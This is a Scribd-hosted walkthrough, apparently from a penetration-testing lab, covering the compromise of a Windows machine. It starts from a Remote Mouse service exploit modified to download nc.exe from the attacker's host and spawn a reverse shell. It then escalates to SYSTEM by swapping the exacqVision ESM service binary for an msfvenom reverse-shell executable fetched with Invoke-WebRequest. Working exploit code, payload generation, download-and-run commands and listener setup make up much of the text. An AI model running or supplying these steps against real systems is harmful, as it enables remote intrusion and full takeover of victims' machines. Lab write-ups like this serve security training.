Scribd
Upload
227 views

89 - Esm

The document summarizes the findings of a vulnerability assessment on a machine located at 192.168.xx.89. Several open ports were discovered including port 21, 80, 139, 445, 1978, 1979, and 8090. Port 1978 was identified as the Remotemouse service which had a known exploit. This exploit was modified to launch a reverse shell back to the attacker's machine. User-level access was gained. Further enumeration revealed an exploitable Exacqvision ESM installation on port 8090. An exploit was used to replace the legitimate application file with a malicious one, granting system-level access when the machine restarted.

Uploaded by

qzombexzombe114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
227 views

89 - Esm

The document summarizes the findings of a vulnerability assessment on a machine located at 192.168.xx.89. Several open ports were discovered including port 21, 80, 139, 445, 1978, 1979, and 8090. Port 1978 was identified as the Remotemouse service which had a known exploit. This exploit was modified to launch a reverse shell back to the attacker's machine. User-level access was gained. Further enumeration revealed an exploitable Exacqvision ESM installation on port 8090. An exploit was used to replace the legitimate application file with a malicious one, granting system-level access when the machine restarted.

Uploaded by

qzombexzombe114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

89 ESM Writeup

1 | Page
.89 Machine

Open ports

21 ..... file zilla


80 ....... apache exacq esm
135
139
445
1978 remoutemouse
1979
1980
8090 ....... apache 2.4.43 ... /project/

21: can connect anonymously


There is project.zip you can download

Zip file contains:

.editorconfig

On 8090

With that name of the zip file

192.168.xx.89:8090/project/
Tried to enum
Found a laravel app

Folders:

2 | Page
.env file contains a app key
(Tried msf and decrypting .env or exploiting it with .env key but not work)

Also on

/storage/framwork/sessions/
Found sessions

But that is useless.

We noticed that 1978 port is open. We googled it and we found that port is for remotemouse

https://wintelguy.com/port-search/1978

Or simply

Nmap 192.168.xx.89 -p1978 -nv

the response is SIN 15win nop nop 300

3 | Page
We found the exploit for the remoutemouse

https://www.exploit-db.com/exploits/46697

But it need some modifications to work properly

The modified part by adding one liner powershell reverse_shell

Ref:

https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/

4 | Page
5 | Page
Add the ip and port

Open terminal

Nc -lnvp 445

Run the exploit

Then you are user.

Alternative: you can also do it with nc.exe

(GOLDEN)

First upload ncat

def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(2)
SendString('''powershell''',ip)
sleep(3)
SendString("\n",ip)
sleep(5)
SendString('''Invoke-WebRequest -Uri 'http://192.168.101.13/nc.exe' -OutFile
C:\Users\Public\nc.exe ''',ip)
6 | Page
sleep(1)
SendString("\n",ip)
sleep(1)
print("SUCCESS! Process calc.exe has run on target",ip)

Then edit again the exploit with:

def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
SendString('''cmd.exe''',ip)
sleep(1)
SendString("\n",ip)
sleep(1)
SendString(“C:\Users\Public\nc.exe 192.168.101.13 1212 -e cmd.exe",ip)
sleep(1)
SendString("\n",ip)
sleep(1)
print("SUCCESS! Process calc.exe has run on target",ip)

Or

7 | Page
Privesc:

Enumerating reveals the vulnerable services

Exacqvision ESM is likely vilnerable

Which is on port 8090

We found the version on login form

exacqVision ESM 5.12.2

8 | Page
We found the privesc exploit

9 | Page
1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.163 LPORT=443 -f exe >
/var/www/html/enterprisesystemmanager.exe

2. Setup listener and ensure apache is running on attacking machine


nc -nlvvp 443
service apache2 start

3. Download malicious .exe on victim machine


Powershell invoke-WebRequest -Uri 'http://192.168.101.13/enterprisesystemmanager.exe’ -OutFile C:\Users\Public\
enterprisesystemmanager.exe

4. Rename C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe
enterprisesystemmanager.exe > enterprisesystemmanager.bak

5. Copy/Move downloaded enterprisesystemmanager.exe file to


C:\exacqVisionEsm\EnterpriseSystemManager\

6. Restart victim machine


Shutdown /r

and setup a listener `nc -nvlp 80’

7. Reverse Shell on attacking machine opens


C:\Windows\system32>whoami
whoami
nt authority\system

10 | Page

You might also like